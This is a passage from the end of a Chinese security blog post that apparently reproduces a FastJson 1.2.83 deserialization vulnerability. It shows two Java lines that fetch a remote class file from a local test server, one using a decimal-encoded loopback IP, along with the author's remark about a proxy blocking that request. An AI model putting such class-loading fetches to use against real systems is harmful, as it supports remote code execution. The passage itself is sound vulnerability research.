<p>然后自己尝试做了测试：然后就猜到有东西拦截了，想了一下，才发现是自己开了代理仅仅放行了ipv4的内网地址网段，后续换成了localhost就可以可以了</p>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">new</span> <span class="title class_">URL</span>(<span class="string">&quot;http://127.0.0.1:19090/a.class&quot;</span>).openConnection()  <span class="comment">// → 200</span></span><br><span class="line"><span class="keyword">new</span> <span class="title class_">URL</span>(<span class="string">&quot;http://2130706433:19090/a.class&quot;</span>).openConnection() <span class="comment">// → 502</span></span><br></pre></td></tr></table></figure>

<p><img src="/Users/n0ne/Downloads/%E8%AF%AD%E9%9B%80%E5%A4%87%E4%BB%BD/%E4%B8%AA%E4%BA%BA%E7%A9%BA%E9%97%B4/%E6%88%91%E4%B8%AA%E4%BA%BA%E7%9A%84/Java%E4%BB%A3%E7%A0%81%E5%AE%A1%E8%AE%A1/assets/FastJson_1.2.83_%E6%BC%8F%E6%B4%9E%E5%A4%8D%E7%8E%B0-25.png" alt="image.png"></p>

    </div>

    
    
    

    <footer class="post-footer">
          <div class="post-tags">
              <a href="/tags/Java/" rel="tag"># Java</a>
              <a href="/tags/%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90/" rel="tag"># 漏洞分析</a>
          </div>

        

          <div class="post-nav">
            <div class="post-nav-item">
                <a href="/2026/08/06/C3P0-%E9%93%BE/" rel="prev" title="C3P0 链">
                  <i class="fa fa-angle-left"></i> C3P0 链
                </a>
            </div>
            <div class="post-nav-item">
                <a href="/2026/08/06/Fastjson2-%E6%BC%8F%E6%B4%9E/" rel="next" title="Fastjson2 漏洞">
                  Fastjson2 漏洞 <i class="fa fa-angle-right"></i>
                </a>
            </div>
          </div>
    </footer>
  </article>
</div>






</div>
  </main>

  <footer class="footer">
    <div class="footer-inner">

  <div class="copyright">
    &copy; 
    <span itemprop="copyrightYear">2026</span>
    <span class="with-love">
      <i class="fa fa-heart"></i>
    </span>
    <span class="author" itemprop="copyrightHolder">Hai0u</span>
  </div>
  <div class="powered-by">由 <a href="https://hexo.io/" rel="noopener" target="_blank">Hexo</a> & <a href="https://theme-next.js.org/" rel="noopener" target="_blank">NexT.Gemini</a> 强力驱动
  </div>

    </div>
  </footer>

  
  <div class="toggle sidebar-toggle" role="button">
    <span class="toggle-line"></span>
    <span class="toggle-line"></span>
    <span class="toggle-line"></span>
  </div>
  <div class="sidebar-dimmer"></div>

<noscript>
  <div class="noscript-warning">Theme NexT works best with JavaScript enabled</div>
</noscript>

</body>
</html>
